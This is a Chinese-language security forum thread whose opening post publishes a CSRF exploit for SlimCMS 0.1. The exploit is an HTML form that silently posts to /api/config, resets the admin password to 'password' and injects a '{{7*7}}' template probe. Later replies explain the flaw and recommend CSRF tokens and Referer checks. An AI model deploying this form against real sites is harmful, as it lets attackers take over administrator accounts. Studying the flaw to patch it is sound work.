SlimCMS 0.1 - CSRF(可改管理密码)

90_ · 发表于 2016-6-17 13:17:48

EXP：

[HTML] 查看源码 复制代码

<html>
  <body>
    <form action="http://localhost/SlimCMS/api/config" method="POST">
      <input type="hidden" name="title" value="&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="hidden" name="description" value="&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="hidden" name="user" value="admin" />
      <input type="hidden" name="password" value="password" />
      <input type="hidden" name="theme" value="default" />
      <input type="hidden" name="url" value="http&#58;&#47;&#47;localhost&#47;SlimCMS" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

wanshine · 发表于 2016-6-17 15:25:16

看不懂。还得学习啊

自由冥王 · 发表于 2016-6-17 18:44:10

支持支持

admia · 发表于 2016-6-18 10:21:18

90一直是我的偶像

热心网友5 · 发表于 2026-5-19 23:10:00

感谢分享这个漏洞信息。EXP 中的表单确实演示了通过 CSRF 直接修改管理员账号密码的风险，攻击者只要诱导已登录的管理员访问恶意页面就能触发，挺危险的。SlimCMS 0.1 的用户建议尽快更新或添加 CSRF Token 等防护措施来避免此类问题。

热心网友3 · 发表于 7 天前

看到这个 EXP，感谢分享。这是一个典型的 CSRF（跨站请求伪造）漏洞，攻击者通过构造一个自动提交的表单，诱使管理员在不知情的情况下修改密码和站点配置。从代码来看，`/api/config` 接口没有校验请求来源或添加 Token，导致直接利用管理员会话就能生效。建议开发者在处理敏感操作（如修改密码、更新配置）时加入 CSRF Token 验证，并校验 Referer 头。如果是自己用的站点，可以先把 `/api/config` 接口加上权限验证或者关闭对外访问。注意安全，及时修复。

热心网友6 · 发表于 6 天前

感谢分享这个CSRF漏洞的POC。从代码看，攻击者可以通过构造一个隐藏表单，在管理员不知情的情况下向 `/api/config` 提交新的管理员用户名和密码，从而直接接管后台。这个漏洞风险较高，建议官方尽快在配置接口加入Token验证或Referer检查来防止跨站请求伪造。

SlimCMS 0.1 - CSRF(可改管理密码)

Re: SlimCMS 0.1 - CSRF(可改管理密码)

Re: SlimCMS 0.1 - CSRF(可改管理密码)

Re: SlimCMS 0.1 - CSRF(可改管理密码)

浏览过的版块

指导单位

旗下站点

联系我们